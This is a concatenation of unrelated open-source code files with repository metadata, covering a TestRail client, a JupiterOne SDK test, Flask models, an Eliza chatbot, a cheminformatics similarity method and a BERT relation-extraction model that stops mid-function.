extract_list = [Defines.TR_TC_ID]
status, tp_info_list = self.tr_get_testsuite_info_in_test_plan(plan_id)
# Make sure if the automation key is present in the extract list.
# This step is required as we need to segregate manual and automated test cases
if Defines.TR_TC_CUSTOM_AUTOMATED not in extract_list:
extract_list.append(Defines.TR_TC_CUSTOM_AUTOMATED)
self._log.info("Adding {} key to the extract list".format(Defines.TR_TC_CUSTOM_AUTOMATED))
if status:
self._log.error("Extracted dictionary of plan {}".format(plan_id))
for run_dic in tp_info_list:
# For each item(suite) in test plan, extract the run-id(key) and the config params (keys)
for run_id, tp_suite_info in run_dic.items():
status, tc_list = self.tr_get_tescase_in_run(run_id, extract_list)
for tc in tc_list:
if tc['custom_automated']:
automated_test_case_list.append(tc)
else:
manual_test_case_list.append(tc)
else:
self._log.error("Error in extracting information from test plan {}".format(plan_id))
return status, automated_test_case_list, manual_test_case_list
def get_test_plan_results(self, plan_id, automated):
"""
This method will get all the test cases status (results) for a test plan.
This method will first find the runs of a test plan and then segregates the
test to manual and automated lists
:param plan_id: Plan id
:param automated:
Define.TR_MANUAL_TC = Manual test cases
Defines.TR_AUTOMATED_TC = Automated test cases
Defines.TR_ALL_TC = Manual and automated test cases
:return: status ( Boolean),
manual_tc ( Manual test case list) ,
automated_tc( Automated test case list)
"""
automated_tc = Defines.TR_TC_RESULTS_DICT.copy()
manual_tc = Defines.TR_TC_RESULTS_DICT.copy()
# Get all the test cases for the test plan
# If automation is True get only automated test case
status, automated_test_case_list, manual_test_case_list = self.tr_get_testcase_in_test_plan(plan_id, extract_list=[Defines.TR_TC_STATUS_ID])
# Get the results based on automated flag
if status:
try:
if automated in Defines.TR_MANUAL_TC or automated in Defines.TR_ALL_TC:
for tc in manual_test_case_list:
status_id = tc[Defines.TR_TC_STATUS_ID]
manual_tc[Defines.TR_TC_STATUS_DICT[status_id]] = manual_tc[Defines.TR_TC_STATUS_DICT[status_id]] + 1
if automated in Defines.TR_AUTOMATED_TC or automated in Defines.TR_ALL_TC:
for tc in automated_test_case_list:
status_id = tc[Defines.TR_TC_STATUS_ID]
automated_tc[Defines.TR_TC_STATUS_DICT[status_id]] = automated_tc[Defines.TR_TC_STATUS_DICT[status_id]] + 1
manual_tc[Defines.TC_TOTAL] = sum(manual_tc.values())
automated_tc[Defines.TC_TOTAL] = sum(automated_tc.values())
except KeyError:
# Raise the error else the result will not match with TestRail. The missing key needs to be fixed.
self._log.exception("Please check the TR_TC_STATUS_DICT parameters. Looks like these a mismatch with TestRail")
raise KeyError("Please check the TR_TC_STATUS_DICT parameters. Looks like these a mismatch with TestRail")
self._log.info("Manual test case = {}".format(manual_tc))
self._log.info("Automated test case = {}".format(automated_tc))
return status, manual_tc, automated_tc
def tr_add_test_case_result(self, run_id, case_id, status_id, jir_defect=None, version=None, comments=None, elapsed=None):
"""
This method will post result for a test case. We meed run id or the test plan and case id of the test
to post results.
:param run_id: (Mandatory) Run id of the test plan (Note: Suite id which starts with R example: RXXXX)
:param case_id: (Mandatory) Case if of the test case (Note: Case id starts with C example: CXXXX)
:param status_id: (Mandatory) One of the valid status id
(1:pass,2:blocked,3:Untested,4:retest,5:failed,6:Not implemented,7:Not Testable)
:param jir_defect: Any old or know jira defect for this test case
:param version: Test code version ( firmware version)
:param comments: Amu test comments for failure or pass
:param elapsed: Time for the test. Default is 2 seconds
:return: status( Boolean) , updated test case dictionary
"""
# Set the default values
if elapsed is None:
elapsed = Defines.TR_TC_RESULT_DEFAULT_EXEC_TIME
test_result = {
Defines.TR_TC_STATUS_ID: status_id,
Defines.TR_TC_RESULT_COMMENT: comments,
Defines.TR_TC_RESULT_ELAPSED: elapsed,
Defines.TR_TC_RESULT_VERSION: version,
Defines.TR_TC_RESULT_DEFECTS: jir_defect
}
# Make the api string
api_str = Defines.TR_API_ADD_RESULT_FOR_CASES + "/" + str(run_id) + "/" + str(case_id)
self._log.info("Adding results using API string {}".format(api_str))
# Call the API post method
status, return_msg = self.tr_api_post(api_str, test_result)
return status, return_msg
def tr_add_result(self, run_id, params=None):
"""
This method will add result to individual test run ( Starts with TXXXXX)
:param run_id: Test case Test run id
:param params: Parameters to set like status, comments etc
:return: status( Boolean) and return dictionary with updates
"""
if params is None:
params = {Defines.TR_TC_RESULT_ELAPSED: '0', Defines.TR_TC_STATUS_ID: 5}
api_str = Defines.TR_API_ADD_RESULT + "/" + str(run_id)
status, return_msg = self.tr_api_post(api_str, params)
if not status:
self._log.error("Error in adding results for run_id {}".format(run_id))
return status, return_msg
def add_result_for_entire_test_plan(self, test_plan_id, status_id, automated=Defines.TR_ALL_TC, comments=None, elapsed=None, version=None):
"""
This method will set the parameters like status, comment version etc for the entire test plan.
You can use this function for resetting the entire plan before you start. Mostly useful in
nightly test preparation
"""
if elapsed is None:
elapsed = '0'
return_msg = None
# Collect all the test cases of a test plan
status, automated_test_case_list, manual_test_case_list = self.tr_get_testcase_in_test_plan(test_plan_id, extract_list=[Defines.TR_RUN_ID])
tc_list = []
if automated in Defines.TR_AUTOMATED_TC:
tc_list.append(automated_test_case_list)
elif automated in Defines.TR_MANUAL_TC:
tc_list.append(manual_test_case_list)
else:
tc_list.append(manual_test_case_list)
tc_list.append(automated_test_case_list)
for item in tc_list: # manual_test_case_list:
for tc in item:
api_str = Defines.TR_API_ADD_RESULT + "/" + str(tc[Defines.TR_RUN_ID])
param = {
Defines.TR_TC_RESULT_ELAPSED: str(elapsed),
Defines.TR_TC_STATUS_ID: status_id,
Defines.TR_TC_RESULT_COMMENT: comments,
Defines.TR_TC_RESULT_VERSION: version
}
status, return_msg = self.tr_api_post(api_str, param)
return status, return_msg
|
[
"prabhu.mc2@gmail.com"
] |
prabhu.mc2@gmail.com
|
b5bbf3c03b4a409008f345030301327f4049f887
|
f95bba42af9464545bdb1a312189e2b0e1412f30
|
/tests/test_create_relationship.py
|
2bd40420ccc32adf82bfb2d5247833eed1262d7a
|
[
"MIT"
] |
permissive
|
auth0/jupiterone-python-sdk
|
1b7f50ea6c6625ae2ca61761047e31d302b3d1f8
|
1c63eafa029ca3baa5ae6b93f05d98d02747aa2b
|
refs/heads/master
| 2023-06-23T08:59:45.910553
| 2022-10-24T16:18:49
| 2022-10-24T16:18:49
| 237,996,631
| 10
| 9
|
MIT
| 2023-08-22T13:39:18
| 2020-02-03T15:24:30
|
Python
|
UTF-8
|
Python
| false
| false
| 1,623
|
py
|
import json
import pytest
import responses
from jupiterone.client import JupiterOneClient
from jupiterone.constants import CREATE_ENTITY
@responses.activate
def test_tree_query_v1():
def request_callback(request):
headers = {
'Content-Type': 'application/json'
}
response = {
'data': {
'createRelationship': {
'relationship': {
'_id': '1'
},
'edge': {
'id': '1',
'toVertexId': '1',
'fromVertexId': '2',
'relationship': {
'_id': '1'
},
'properties': {}
}
}
}
}
return (200, headers, json.dumps(response))
responses.add_callback(
responses.POST, 'https://api.us.jupiterone.io/graphql',
callback=request_callback,
content_type='application/json',
)
j1 = JupiterOneClient(account='testAccount', token='testToken')
response = j1.create_relationship(
relationship_key='relationship1',
relationship_type='test_relationship',
relationship_class='TestRelationship',
from_entity_id='2',
to_entity_id='1'
)
assert type(response) == dict
assert type(response['relationship']) == dict
assert response['relationship']['_id'] == '1'
assert response['edge']['toVertexId'] == '1'
assert response['edge']['fromVertexId'] == '2'
|
[
"george.vauter@auth0.com"
] |
george.vauter@auth0.com
|
e46bfe25ed1ca04c2013e5b3b818fe6d8d12426d
|
16b2c2365eff11f34ae260321e6dde78ab09b45d
|
/TMS/wsgi.py
|
19451fe2a8a2cafb0e33bcadb5ce91904d0b424c
|
[] |
no_license
|
laken11/TMS
|
bf941802e350a16db0f2314330ad315e73ce48f0
|
c271f2cbb1624ab943c10bacaa6406ec8ca08083
|
refs/heads/dev
| 2023-04-27T22:03:38.811267
| 2021-05-08T12:06:54
| 2021-05-08T12:06:54
| 362,518,465
| 0
| 0
| null | 2021-05-05T10:07:54
| 2021-04-28T15:27:28
|
Python
|
UTF-8
|
Python
| false
| false
| 383
|
py
|
"""
WSGI config for TMS project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'TMS.settings')
application = get_wsgi_application()
|
[
"olaniteolalekan@gmail.com"
] |
olaniteolalekan@gmail.com
|
1cf021d39e6b419e9c054d41ec05167e2b9249b1
|
91e8e668b01e07a038e1e711c2d4fb0a9384b044
|
/25sumofdigit.py
|
3136ad6cfddbfce977418b730bcb14f94efa1bca
|
[] |
no_license
|
parulkyadav/assignment
|
0e0fac8d612b71ec65eb262e90c20f20c03d6954
|
bb80ea96bb60b08b5770c2d35f9e232287a3b1e9
|
refs/heads/master
| 2020-03-31T03:26:51.477580
| 2018-10-06T17:45:25
| 2018-10-06T17:45:25
| 151,865,416
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 236
|
py
|
def counting(num):
n=num
count=0
if n==0 :
print(1)
else:
while n:
l=n%10
n=int(n/10)
count+=1
print(count)
counting(int(input("Enter a number : ")))
|
[
"parul2595@gmail.com"
] |
parul2595@gmail.com
|
841df2c39bcbae541b5e564c3f096b97266701fb
|
daf04580e3725713274fcbbde1bfd6f5a5d3bf4e
|
/methods/ecfc/ecfc6_tanimoto.py
|
53466b68223243ea10edf4f94c05262c492e61f6
|
[
"MIT"
] |
permissive
|
skodapetr/lbvs-environment
|
c1c9b35a243d5ffdb335f3e9e8bc324ed222a0d7
|
0c468b9b87392ffe69e0e7726cf02cc6e2fec5e2
|
refs/heads/master
| 2022-01-18T18:58:37.823094
| 2019-07-31T09:01:50
| 2019-07-31T09:01:50
| 59,012,053
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,365
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import rdkit
from rdkit.Chem import AllChem
from rdkit import DataStructs
__license__ = "X11"
METADATA = {
"id": "method_rdkit_ecfc6_tanimoto",
"representation": "ecfc6",
"similarity": "tanimoto"
}
def _compute_fingerprint(molecule):
return AllChem.GetMorganFingerprint(molecule, 3)
def _compute_similarity(left, right):
return DataStructs.TanimotoSimilarity(left, right)
def create_model(train_ligands, train_decoys):
model = []
for molecule in train_ligands:
model.append({
"name": molecule.GetProp("_Name"),
"fingerprint": _compute_fingerprint(molecule)
})
model_information = {}
return model, model_information
def compute_score(model, molecule):
fingerprint = _compute_fingerprint(molecule)
similarities = [_compute_similarity(fingerprint, item["fingerprint"])
for item in model]
max_score = max(similarities)
index_of_max_score = similarities.index(max_score)
closest_molecule = model[index_of_max_score]
return {
"value": max_score,
"info": {
"closest": closest_molecule["name"]
}
}
def compute_similarity(left, right):
return _compute_similarity(_compute_fingerprint(left),
_compute_fingerprint(right))
|
[
"skodapetr@gmail.com"
] |
skodapetr@gmail.com
|
39fcd96c8a3e146e586324569ed4fdcd59ca857f
|
e71eff6f896ba33ee4bdc8e0267d72ea2783222c
|
/models.py
|
723c0955ca7c37397c0347c6148acd76946c7336
|
[
"MIT"
] |
permissive
|
KMSkelton/cgm_flask
|
8861ebe2697fb5e5f5231e9ea2b66a9cd5c063c8
|
1ad92522e1af4bd7af4a88d4fb503dab8cc260a8
|
refs/heads/master
| 2021-07-08T20:45:00.665610
| 2019-01-18T23:47:05
| 2019-01-18T23:47:05
| 96,000,251
| 1
| 0
|
MIT
| 2019-01-18T23:47:06
| 2017-07-02T03:30:45
|
Python
|
UTF-8
|
Python
| false
| false
| 2,042
|
py
|
from flask import Flask
from marshmallow import Schema, fields, pre_load, validate
from flask_marshmallow import Marshmallow
from flask_sqlalchemy import SQLAlchemy
ma = Marshmallow()
db = SQLAlchemy()
class User(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(128))
username = db.Column(db.String(128), unique=True)
def __init__(self, name, username):
self.username = username
self.name = name
def __repr__(self):
return '<USER {}>'.format(self.name)
class Device(db.Model):
id = db.Column(db.Integer, primary_key=True)
model = db.Column(db.String(75))
manufacturerID = db.Column(db.String(20), unique=True)
def __init__(self, id, model, manufacturerID):
self.id = id
self.model = model
self.manufacturerID = manufacturerID
user_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)
user = db.relationship('User',
backref=db.backref('devices', lazy='dynamic'))
class Measurement(db.Model):
id = db.Column(db.Integer, primary_key=True)
meas_date = db.Column(db.DateTime)
event_type = db.Column(db.String(20))
manufacturerID = db.Column(db.String(20))
gluc_value = db.Column(db.Integer)
insulin_value = db.Column(db.Integer)
carb = db.Column(db.Float)
#joins are worse than duplicated data
def __init__(self, id, meas_date, event_type, manufacturerID, gluc_value, insulin_value, carb):
self.id = id
self.meas_date = meas_date
self.event_type = event_type
self.manufacturerID = manufacturerID
self.gluc_value = gluc_value
self.insulin_value = insulin_value
self.carb = carb
device_id = db.Column(db.Integer, db.ForeignKey('device.id'))
device = db.relationship('Device')
# backref=db.backref('devices', lazy='dynamic'))
user_id = db.Column(db.Integer, db.ForeignKey('user.id'))
user = db.relationship('User')
# backref=db.backref('users', lazy='dynamic'))
|
[
"kmskelton@outlook.com"
] |
kmskelton@outlook.com
|
e6017e8174729d1a2e020467fb7410b382ca9c2d
|
00b9eb134285e97a90fc416e2df4b736fcb14320
|
/main.py
|
dc01c409fc68a566cefa7e6e1beacdffd53eaf46
|
[] |
no_license
|
richmoore/very-basic
|
1caf7d1220c697282a70336dae8444230dcc6852
|
6f2ca6ac3eaa0424336f8b501afd26bab220a9b5
|
refs/heads/master
| 2020-05-20T15:29:48.294263
| 2012-04-09T19:40:27
| 2012-04-09T19:40:27
| 32,982,462
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 819
|
py
|
#!/usr/bin/python -tt
from lexer import tokenize
from parser import Parser
from runtime import run
def print_tree(tree, terminals, indent=0):
"""Print a parse tree to stdout."""
prefix = " "*indent
if tree[0] in terminals:
print prefix + repr(tree)
else:
print prefix + unicode(tree[0])
for x in tree[1:]:
print_tree(x, terminals, indent+1)
def main(filename):
input = open(filename)
parser = Parser()
try:
tree = parser.parse(tokenize(input))
#print_tree(tree, parser.terminals)
run(tree)
except parser.ParseErrors, e:
for token, expected in e.errors:
print 'Found', token, 'when', expected, 'was expected'
if __name__ == '__main__':
import sys
filename = sys.argv[1]
main(filename)
|
[
"rich@kde.org"
] |
rich@kde.org
|
0ee2be706cd349155154197d8f187ac59b1fad33
|
4ae6c47d843d749c9c85543bd76ddc4da6bb06f4
|
/dataformat-json-jackson/src/test/resources/org/camunda/spin/python/json/tree/JsonTreeJsonPathPythonTest.shouldFailReadingElementList.py
|
05c2c70b8d6ee285aee78bd1f87abe34863a645e
|
[
"Apache-2.0"
] |
permissive
|
nibin/camunda-spin
|
2a34943ffdec9edff26ea80555292c079b16f656
|
327204a0b9281fe793241c6499f666d4ddc5d1b0
|
refs/heads/master
| 2021-01-23T23:03:44.093281
| 2014-11-12T12:57:37
| 2014-11-12T12:58:17
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 66
|
py
|
jsonNode = JSON(input)
jsonNode.jsonPath('$.order').elementList()
|
[
"stefan.hentschel@camunda.com"
] |
stefan.hentschel@camunda.com
|
4b8dba5ffb48cb94ad49375363ab728d9412e3b6
|
4a91cc8b51d7f03afceaa1b3ce06439dfc2907cb
|
/eliza/eliza.py
|
04eb24ed8b66b52ab3f7a3c9219deaa7532d8bff
|
[
"MIT"
] |
permissive
|
Marcombo/curso_IoT
|
b2e1c6bdfd2574bb3fc3d61b89409adc1e6bca21
|
d38b58ed9be87bcfc267623abce4ad16fad2f8ed
|
refs/heads/master
| 2023-04-08T03:24:50.327703
| 2021-04-15T18:13:36
| 2021-04-15T18:13:36
| 274,207,613
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 10,165
|
py
|
#----------------------------------------------------------------------
# eliza.py
#
# a cheezy little Eliza knock-off by Joe Strout
# with some updates by Jeff Epler
# hacked into a module and updated by Jez Higgins
#----------------------------------------------------------------------
import string
import re
import random
class Eliza:
def __init__(self):
self.keys = list(map(lambda x: re.compile(x[0], re.IGNORECASE), gPats))
self.values = list(map(lambda x: x[1], gPats))
#----------------------------------------------------------------------
# translate: take a string, replace any words found in vocabulary.keys()
# with the corresponding vocabulary.values()
#----------------------------------------------------------------------
def translate(self, text, vocabulary):
words = text.lower().split()
keys = vocabulary.keys();
for i in range(0, len(words)):
if words[i] in keys:
words[i] = vocabulary[words[i]]
return ' '.join(words)
#----------------------------------------------------------------------
# respond: take a string, a set of regexps, and a corresponding
# set of response lists; find a match, and return a randomly
# chosen response from the corresponding list.
#----------------------------------------------------------------------
def respond(self, text):
# find a match among keys
for i in range(0, len(self.keys)):
match = self.keys[i].match(text)
if match:
# found a match ... stuff with corresponding value
# chosen randomly from among the available options
resp = random.choice(self.values[i])
# we've got a response... stuff in reflected text where indicated
pos = resp.find('%')
while pos > -1:
num = int(resp[pos+1:pos+2])
resp = resp[:pos] + \
self.translate(match.group(num), gReflections) + \
resp[pos+2:]
pos = resp.find('%')
# fix munged punctuation at the end
if resp[-2:] == '?.': resp = resp[:-2] + '.'
if resp[-2:] == '??': resp = resp[:-2] + '?'
return resp
return None
#----------------------------------------------------------------------
# gReflections, a translation table used to convert things you say
# into things the computer says back, e.g. "I am" --> "you are"
#----------------------------------------------------------------------
gReflections = {
"am" : "are",
"was" : "were",
"i" : "you",
"i'd" : "you would",
"i've" : "you have",
"i'll" : "you will",
"my" : "your",
"are" : "am",
"you've": "I have",
"you'll": "I will",
"your" : "my",
"yours" : "mine",
"you" : "me",
"me" : "you"
}
#----------------------------------------------------------------------
# gPats, the main response table. Each element of the list is a
# two-element list; the first is a regexp, and the second is a
# list of possible responses, with group-macros labelled as
# %1, %2, etc.
#----------------------------------------------------------------------
gPats = [
[r'I need (.*)',
[ "Why do you need %1?",
"Would it really help you to get %1?",
"Are you sure you need %1?"]],
[r'Why don\'?t you ([^\?]*)\??',
[ "Do you really think I don't %1?",
"Perhaps eventually I will %1.",
"Do you really want me to %1?"]],
[r'Why can\'?t I ([^\?]*)\??',
[ "Do you think you should be able to %1?",
"If you could %1, what would you do?",
"I don't know -- why can't you %1?",
"Have you really tried?"]],
[r'I can\'?t (.*)',
[ "How do you know you can't %1?",
"Perhaps you could %1 if you tried.",
"What would it take for you to %1?"]],
[r'I am (.*)',
[ "Did you come to me because you are %1?",
"How long have you been %1?",
"How do you feel about being %1?"]],
[r'I\'?m (.*)',
[ "How does being %1 make you feel?",
"Do you enjoy being %1?",
"Why do you tell me you're %1?",
"Why do you think you're %1?"]],
[r'Are you ([^\?]*)\??',
[ "Why does it matter whether I am %1?",
"Would you prefer it if I were not %1?",
"Perhaps you believe I am %1.",
"I may be %1 -- what do you think?"]],
[r'What (.*)',
[ "Why do you ask?",
"How would an answer to that help you?",
"What do you think?"]],
[r'How (.*)',
[ "How do you suppose?",
"Perhaps you can answer your own question.",
"What is it you're really asking?"]],
[r'Because (.*)',
[ "Is that the real reason?",
"What other reasons come to mind?",
"Does that reason apply to anything else?",
"If %1, what else must be true?"]],
[r'(.*) sorry (.*)',
[ "There are many times when no apology is needed.",
"What feelings do you have when you apologize?"]],
[r'Hello(.*)',
[ "Hello... I'm glad you could drop by today.",
"Hi there... how are you today?",
"Hello, how are you feeling today?"]],
[r'I think (.*)',
[ "Do you doubt %1?",
"Do you really think so?",
"But you're not sure %1?"]],
[r'(.*) friend (.*)',
[ "Tell me more about your friends.",
"When you think of a friend, what comes to mind?",
"Why don't you tell me about a childhood friend?"]],
[r'Yes',
[ "You seem quite sure.",
"OK, but can you elaborate a bit?"]],
[r'(.*) computer(.*)',
[ "Are you really talking about me?",
"Does it seem strange to talk to a computer?",
"How do computers make you feel?",
"Do you feel threatened by computers?"]],
[r'Is it (.*)',
[ "Do you think it is %1?",
"Perhaps it's %1 -- what do you think?",
"If it were %1, what would you do?",
"It could well be that %1."]],
[r'It is (.*)',
[ "You seem very certain.",
"If I told you that it probably isn't %1, what would you feel?"]],
[r'Can you ([^\?]*)\??',
[ "What makes you think I can't %1?",
"If I could %1, then what?",
"Why do you ask if I can %1?"]],
[r'Can I ([^\?]*)\??',
[ "Perhaps you don't want to %1.",
"Do you want to be able to %1?",
"If you could %1, would you?"]],
[r'You are (.*)',
[ "Why do you think I am %1?",
"Does it please you to think that I'm %1?",
"Perhaps you would like me to be %1.",
"Perhaps you're really talking about yourself?"]],
[r'You\'?re (.*)',
[ "Why do you say I am %1?",
"Why do you think I am %1?",
"Are we talking about you, or me?"]],
[r'I don\'?t (.*)',
[ "Don't you really %1?",
"Why don't you %1?",
"Do you want to %1?"]],
[r'I feel (.*)',
[ "Good, tell me more about these feelings.",
"Do you often feel %1?",
"When do you usually feel %1?",
"When you feel %1, what do you do?"]],
[r'I have (.*)',
[ "Why do you tell me that you've %1?",
"Have you really %1?",
"Now that you have %1, what will you do next?"]],
[r'I would (.*)',
[ "Could you explain why you would %1?",
"Why would you %1?",
"Who else knows that you would %1?"]],
[r'Is there (.*)',
[ "Do you think there is %1?",
"It's likely that there is %1.",
"Would you like there to be %1?"]],
[r'My (.*)',
[ "I see, your %1.",
"Why do you say that your %1?",
"When your %1, how do you feel?"]],
[r'You (.*)',
[ "We should be discussing you, not me.",
"Why do you say that about me?",
"Why do you care whether I %1?"]],
[r'Why (.*)',
[ "Why don't you tell me the reason why %1?",
"Why do you think %1?" ]],
[r'I want (.*)',
[ "What would it mean to you if you got %1?",
"Why do you want %1?",
"What would you do if you got %1?",
"If you got %1, then what would you do?"]],
[r'(.*) mother(.*)',
[ "Tell me more about your mother.",
"What was your relationship with your mother like?",
"How do you feel about your mother?",
"How does this relate to your feelings today?",
"Good family relations are important."]],
[r'(.*) father(.*)',
[ "Tell me more about your father.",
"How did your father make you feel?",
"How do you feel about your father?",
"Does your relationship with your father relate to your feelings today?",
"Do you have trouble showing affection with your family?"]],
[r'(.*) child(.*)',
[ "Did you have close friends as a child?",
"What is your favorite childhood memory?",
"Do you remember any dreams or nightmares from childhood?",
"Did the other children sometimes tease you?",
"How do you think your childhood experiences relate to your feelings today?"]],
[r'(.*)\?',
[ "Why do you ask that?",
"Please consider whether you can answer your own question.",
"Perhaps the answer lies within yourself?",
"Why don't you tell me?"]],
[r'quit',
[ "Thank you for talking with me.",
"Good-bye.",
"Thank you, that will be $150. Have a good day!"]],
[r'(.*)',
[ "Please tell me more.",
"Let's change focus a bit... Tell me about your family.",
"Can you elaborate on that?",
"Why do you say that %1?",
"I see.",
"Very interesting.",
"%1.",
"I see. And what does that tell you?",
"How does that make you feel?",
"How do you feel when you say that?"]]
]
#----------------------------------------------------------------------
# command_interface
#----------------------------------------------------------------------
'''def command_interface():
print('Therapist\n---------')
print('Talk to the program by typing in plain English, using normal upper-')
print('and lower-case letters and punctuation. Enter "quit" when done.')
print('='*72)
print('Hello. How are you feeling today?')
s = ''
therapist = Eliza();
while s != 'quit':
try:
s = input('> ')
except EOFError:
s = 'quit'
print(s)
while s[-1] in '!.':
s = s[:-1]
print(therapist.respond(s))
'''
|
[
"ferri.fc@gmail.com"
] |
ferri.fc@gmail.com
|
08e6e9616fe6a91d63adef510f938ac99e569b81
|
9249f87109471de1fc3f3c3c1b121f51c09df683
|
/lesson_3/test_10.py
|
89d99c4f00ee36886084f1928bbce7ee094081ba
|
[] |
no_license
|
anton1k/mfti-homework
|
400a8213a57e44478d65437f5afef0432e8e84ea
|
93683de329e6cb0001e713214aeb3069f6e213b0
|
refs/heads/master
| 2020-07-18T23:41:11.473608
| 2020-01-12T10:58:16
| 2020-01-12T10:58:16
| 206,335,501
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 652
|
py
|
# Последовательность состоит из натуральных чисел и завершается числом 0. Всего вводится не более 10000 чисел (не считая завершающего числа 0). Определите, сколько элементов этой последовательности равны ее наибольшему элементу. Числа, следующие за числом 0, считывать не нужно.
d = 0
s = 0
while True:
x = int(input())
if x == 0:
break
if x > d:
d, s = x, 1
elif x == d:
s += 1
print(s)
|
[
"40913464+anton1k@users.noreply.github.com"
] |
40913464+anton1k@users.noreply.github.com
|
8ee3f4c7e8272328dcaab0d5419cc3d2fd076a9e
|
cfda84d6b814d5a1adadd06ca03be1c260d3820a
|
/scripts/poller_config.py
|
0a1d176f30ab49fc121b78ca2ea804dc1490efbc
|
[] |
no_license
|
thetherington/SDVN-IPG-Link-Monitor
|
6b4bab34e9549cecb2726f7f39ec060e6084707c
|
c06230cc7ff473a99f812c1a64bfd2987c0da4f2
|
refs/heads/master
| 2023-06-27T15:14:43.010344
| 2021-07-30T14:12:18
| 2021-07-30T14:12:18
| 296,078,442
| 0
| 0
| null | 2021-07-30T14:12:18
| 2020-09-16T15:47:43
|
Python
|
UTF-8
|
Python
| false
| false
| 834
|
py
|
import json
from edge_port import EdgeCollector
from insite_plugin import InsitePlugin
class Plugin(InsitePlugin):
def can_group(self):
return False
def fetch(self, hosts):
try:
self.collector
except Exception:
# from ThirtyRock_PROD_edge_def import return_reverselookup
params = {
# "dual_hot": True,
# "annotate_db": return_reverselookup(),
"magnum_cache": {
"insite": "127.0.0.1",
"nature": "mag-1",
"cluster_ip": hosts[-1],
"ipg_matches": ["570IPG-X19-25G", "SCORPION", "3067VIP10G-3G"],
},
}
self.collector = EdgeCollector(**params)
return json.dumps(self.collector.collect)
|
[
"thomas@hetheringtons.org"
] |
thomas@hetheringtons.org
|
e690cec87c5c720fb3cc337f89f24478e2089b17
|
5f84d6651095327f35885f0b7a563457152718f0
|
/seq2seq/bert_relation_extraction.py
|
74bd4e03fc09405ae0b19d8f7a888306f4bb350c
|
[] |
no_license
|
ElderWanng/BERTS2S
|
3a1bd7de227ecc95d5bfec542c7885d560e93590
|
85a6a138d3901b9c0890149a2403682d4d3cda96
|
refs/heads/master
| 2023-03-19T09:46:23.613734
| 2021-03-19T08:02:33
| 2021-03-19T08:02:33
| 343,244,453
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,516
|
py
|
## bert 关系抽取模型
import torch
import torch.nn as nn
from seq2seq.BS2S_tokenizer import load_chinese_base_vocab, Tokenizer
from seq2seq.basic_bert import BasicBert
class BertRelationExtrac(BasicBert):
"""
"""
def __init__(self, word2ix, predicate_num, model_name="roberta"):
super(BertRelationExtrac, self).__init__()
self.predicate_num = predicate_num
config = ""
if model_name == "roberta":
from seq2seq.model.roberta_model import BertModel, BertConfig, BertPredictionHeadTransform, BertLayerNorm
config = BertConfig(len(word2ix))
self.bert = BertModel(config)
self.layer_norm = BertLayerNorm(config.hidden_size)
self.layer_norm_cond = BertLayerNorm(config.hidden_size, conditional=True)
elif model_name == "bert":
from seq2seq.model.bert_model import BertConfig, BertModel, BertPredictionHeadTransform, BertLayerNorm
config = BertConfig(len(word2ix))
self.bert = BertModel(config)
self.layer_norm = BertLayerNorm(config.hidden_size)
self.layer_norm_cond = BertLayerNorm(config.hidden_size, conditional=True)
else :
raise Exception("model_name_err")
self.subject_pred = nn.Linear(config.hidden_size, 2)
self.activation = nn.Sigmoid()
self.object_pred = nn.Linear(config.hidden_size, 2 * self.predicate_num)
def binary_crossentropy(self, labels, pred):
labels = labels.float()
loss = (-labels) * torch.log(pred) - (1.0 - labels) * torch.log(1.0 - pred)
return loss
def compute_total_loss(self, subject_pred, object_pred, subject_labels, object_labels):
"""
计算loss
"""
subject_loss = self.binary_crossentropy(subject_labels, subject_pred)
subject_loss = torch.mean(subject_loss, dim=2)
subject_loss = (subject_loss * self.target_mask).sum() / self.target_mask.sum()
object_loss = self.binary_crossentropy(object_labels, object_pred)
object_loss = torch.mean(object_loss, dim=3).sum(dim=2)
object_loss = (object_loss * self.target_mask).sum() / self.target_mask.sum()
return subject_loss + object_loss
def extrac_subject(self, output, subject_ids):
## 抽取subject的向量表征
batch_size = output.shape[0]
hidden_size = output.shape[-1]
start_end = torch.gather(output, index=subject_ids.unsqueeze(-1).expand((batch_size, 2, hidden_size)), dim=1)
subject = torch.cat((start_end[:, 0], start_end[:, 1]), dim=-1)
return subject
def forward(self, text, subject_ids, position_enc=None, subject_labels=None, object_labels=None, use_layer_num=-1):
if use_layer_num != -1:
if use_layer_num < 0 or use_layer_num > 7:
# 越界
raise Exception("层数选择错误,因为bert base模型共8层,所以参数只只允许0 - 7, 默认为-1,取最后一层")
# 计算target mask
text = text.to(self.device)
subject_ids = subject_ids.to(self.device)
self.target_mask = (text > 0).float()
enc_layers, _ = self.bert(text,
output_all_encoded_layers=True)
squence_out = enc_layers[use_layer_num]
sub_out = enc_layers[-1]
subject_pred_out = self.subject_pred(squence_out)
subject_pred_act = self.activation(subject_pred_out)
# subject_pred_act = subject_pred_act**2
subject_vec = self.extrac_subject(sub_out, subject_ids)
object_layer_norm = self.layer_norm_cond([sub_out, subject_vec])
object_pred_out = self.object_pred(object_layer_norm)
object_pred_act = self.activation(object_pred_out)
# object_pred_act = object_pred_act**4
batch_size, seq_len, target_size = object_pred_act.shape
object_pred_act = object_pred_act.reshape((batch_size, seq_len, int(target_size/2), 2))
predictions = object_pred_act
if subject_labels is not None and object_labels is not None:
## 计算loss
subject_labels = subject_labels.to(self.device)
object_labels = object_labels.to(self.device)
loss = self.compute_total_loss(subject_pred_act, object_pred_act, subject_labels, object_labels)
return predictions, loss
else :
return predictions
def predict_subject(self, text,use_layer_num=-1, device="cpu"):
if use_layer_num != -1:
if use_layer_num < 0 or use_layer_num > 7:
# 越界
raise Exception("层数选择错误,因为bert base模型共8层,所以参数只只允许0 - 7, 默认为-1,取最后一层")
text = text.to(self.device)
self.target_mask = (text > 0).float()
enc_layers, _ = self.bert(text, output_all_encoded_layers=True)
